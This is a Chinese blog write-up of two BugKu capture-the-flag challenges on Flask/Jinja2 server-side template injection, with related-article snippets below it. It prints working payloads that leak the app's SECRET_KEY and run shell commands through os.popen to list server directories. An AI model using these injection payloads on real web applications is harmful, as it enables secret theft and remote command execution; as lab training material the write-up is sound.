# BUGKU Simple_SSTI_1-2

最新推荐文章于 2024-04-21 18:47:10 发布
最新推荐文章于 2024-04-21 18:47:10 发布
阅读量743 收藏 1
点赞数
分类专栏: SSTI 文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zbbjya/article/details/123489936
版权

BUGKU Simple_SSTI_1

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述查看网页源代码
在这里插入图片描述
提示需要传一个flag参数,Flask 是一个微型的 Python 开发的 Web 框架,
由上可知flag在secret_key下,config是flask模板中的一个全局对象而使用
/?flag={{config.items()}} 读取配置文件可得到,其数据,flag也在里面
/?flag={{config.SECRET_KEY}} 可直接得到flag

Simple_SSTI_2

同样提示需要传一个flag参数
在这里插入图片描述

查看网页源代码没什么有用的东西我感觉
在这里插入图片描述
传入错误的语句python的flask模板注入,jinja2
在这里插入图片描述构造一个参数被执行说明这个存在ssti注入
在这里插入图片描述查看flask与ssti的相关知识详情参考以下链接
https://blog.csdn.net/weixin_51353029/article/details/111503731?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164749748316780357215631%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=164749748316780357215631&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2alltop_positive~default-1-111503731.142v2pc_search_result_control_group,143v4control&utm_term=ssti&spm=1018.2226.3001.4187

?flag={{ config.class.init.globals[‘os’].popen(‘ls …/’).read() }}
我的理解是返回这个对象初始化包含的全局变量的列表察看模式
popen方法通过p.read()获取终端输出,而且popen需要关闭close().当执行成功时,close()不返回任何值,失败时,close()返回系统返回值(失败返回1). 可见它获取返回值的方式和os.system不同。
后面这个其实理解还是没有那么透彻,如果有哪位同仁是对其比较了解的话可以在评论区告知一下谢谢
发现有个app的文件夹
在这里插入图片描述/?flag={{ config.class.init.globals[‘os’].popen(‘ls …/app’).read() }}
发现flag在app里面
在这里插入图片描述
/?flag={{ config.class.init.globals[‘os’].popen(‘ls …/app/flag’).read() }}
在这里插入图片描述

zbbjya
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Simple_SSTI_1
qq_47094508的博客
08-10 1281
到这里咋们可以开始爆破pin码然后继续去搜索jinja2+flask相关的知识(才发现这mac没有密码字典!点击访问,发现需要输入pin码才能进行操作,密码爆破先放一下,看一下能不能通过前端绕过。让服务器报错泄漏更多信息,方便整理思路,jinja2+flask。拿到题目直接直接目录爆破走一波,可以发现有一个控制台被爆出来了。按照模版注入的思路走的话,直接拼接代码就行,典型的模版注入特征。输入命令返回404,这不确定是成功了还是失败了,先放一放。而secret_key是flask里面一项重要的配置项。...
Simple_SSTI_1与Simple_SSTI_2
heyingcheng的博客
10-17 3027
#__globals__[] 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。flask是一个使用Python编写的轻量级Web应用框架(一种开发框架,用来支持动态网站,网络应用程序及网络服务的开发。3,SECRET_KEY配置变量是通用密钥,可在Flask和多个第三方扩展中使用,加密的强度取决于变量值的机密度,不同的程序使用不同的密钥。于是猜测flag是否藏在某一个文件夹中,于是尝试用ls列举出文件夹中的文件一下。
bugku解题篇—Simple_SSTI_2
最新发布
XZ_______的博客
04-21 336
解题
BugKu 刷题笔记】【Simple_SSTI_1】
一个程序员
02-20 1447
文章目录0x01 题目0x02 题解0x03 知识点1. flask 与 secret_key2. 模板注入 0x01 题目 0x02 题解 输入url为: http://114.67.175.224:19636/?flag={{config.SECRET_KEY}} 即可得到flag 0x03 知识点 初学者, 在网上搜解题思路很容易可以找到。 但是不知其所以然所以整理一下知识点: 包含以下知识点: 1. flask 与 secret_key flask是一个轻量级的可定制框架,使用Python语言
WEB Simple_SSTI_1
m0_57954651的博客
05-01 1323
Simple_SSTI_1 译为 简单_服务器模板注入 百度了一下它的知识点 ......... 当然远不止这些 自己动手 打开题目 它很直接的就告诉我们 您需要传入一个名为flag的参数 然后 F12查看一下源码 又告诉我们 <你知道,在flask框架中,我们通常设置一个SECRET_KEY变量 > 再百度一下 flask框架 SECRET_KEY变量 so 尝试一下 构造URL 为flag赋值 正常传出 再次尝...
BugKu-Web-Simple_SSTI_1&Simple_SSTI_2(浅析SSTI模板注入!)
m0_73734159的博客
12-13 1127
服务端接收了用户的恶意输入以后,未经任何处理就将其作为Web应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell等问题。{{}}是模板变量的用法。在模板中,想要展示视图向模板渲染的变量,需要使用{{变量}}进行接收。这些文件包含了程序运行所需的设置和参数,使得程序可以根据配置文件的内容进行适应性调整。唉,我不免耸了耸肩,有些无奈,并未发现什么有用的。对于这段命令,在第一题,我也是有所提及,相差不大。
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
gentlexue#POC-3#Apache OfBiz 服务器端模板注入(SSTI)1
07-25
Apache OfBiz 服务器端模板注入(SSTI)Apache OfBiz 17.12.01容易受到服务器端模板注入(SSTI)的影响,从而导致远程代码执行
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。...
SSTI
03-09
**SSTI(Server-Side Template Injection)**是一种严重的网络安全漏洞,主要出现在使用服务器端模板引擎的Web应用程序中。这种漏洞允许攻击者注入恶意代码到服务器端模板,从而执行任意服务器端代码,获取敏感信息...
Gf-Patterns:GF模式(ssrf,RCE,Lfi,sqli,ssti,idor,URL重定向,debug_logic,有趣的Subs)参数grep
03-19
Gf模式V 1.9 By grep的包装器,可帮助您grep处理问题安装如果您已经安装并配置了Go,则可以使用以下命令安装waybackurls & Gf : :play_button: go get -u github....
[bugku]Simple_SSTI_1
ZhShy
03-10 318
题目: 进入页面先按F12 有个提示secret_key 考虑模板注入 输入url: http://114.67.175.224:10472/?flag={{config}} 直接找到了flag 如果访问 http://114.67.175.224:10472/?flag={{config.SECRET_KEY}} 可以直接显示flag
Bugku Simple_SSTI_2
qq_52718293的博客
10-23 2495
首先打开之后是上面这样,题目有提示是ssti,所以
Bugku CTF Web Simple_SSTI_1 & Simple_SSTI_2
网安小趴菜
09-05 416
Bugku CTF Web Simple_SSTI_1 & Simple_SSTI_2
[CSCCTF 2019 Qual] FlaskLight
汗的博客
08-29 1543
信息收集 index大致就这样,没什么信息 F12看下,发现了线索:search参数 试下ssti 基本就是ssti了 漏洞利用 config 也是 Flask模版中的一个全局对象,它包含了所有应用程序的配置值。 {{ config.items() }} // 查看配置项目的信息 输入:http://xxxxx//?search={{%20config.items()%20}} 爆出一堆信息,这里获得第二个线索,flag在这个目录 You searched for: [('JSON_
Bugku WEB Simple_SSTI_2
lin的博客
04-12 1538
1. 打开后,题目提示存在模板注入 2. 先进行ls查看一下存在的文件。 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 根据URL转换表,%20 -> 空格 %27 -> ', 上面的URL对应字符串为: /?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read(
BUGKU加密题rsa详解+脚本
weixin_43211186的博客
11-10 1758
首先,我们分析一下这个题,这个题是根据RSA加密算法,我们知道了n,e,密文求明文 N = p*q(p,q均为素数) 我们用Wiener’s attack脚本进行分解素数 求出p,q后,我们进行解密求出明文,脚本如下 先分解一下素数 def continued_fractions_expansion(numerator,denominator):#(e,N) result=[] ...
十八、bugku Simple_SSTI_1
山兔的博客
09-06 546
ssti主要为python的一些框架 jinja2 mako tornado django,PHP框架smarty twig,java框架jade velocity等等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入,模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。 http://114.67.246.176:10828/?flag={{config}} ?flag={{config.SECRET_KEY}} {{}}是变量包裹标识符。{{}
bugku web题解
陶的博客
09-22 226
1、Simple_SSTI_1: 打开场景 查看一下网页源代码 flag在secret_key下 以get方式传递参数flag={{config.SECRET_KEY}}即得到flag。 也就是114.67.246.176:18677/?flag={{config.SECRET_KEY}} SECRET_KEY是config配置里面的一个值 ...
bugku simple_ssti_1
03-16
simple_ssti_1 是一道来自 Bugku 的简单 Server-Side Template Injection(SSTI)漏洞题目。 SSTI 漏洞通常发生在使用模板引擎时,攻击者可以利用这种漏洞执行任意代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值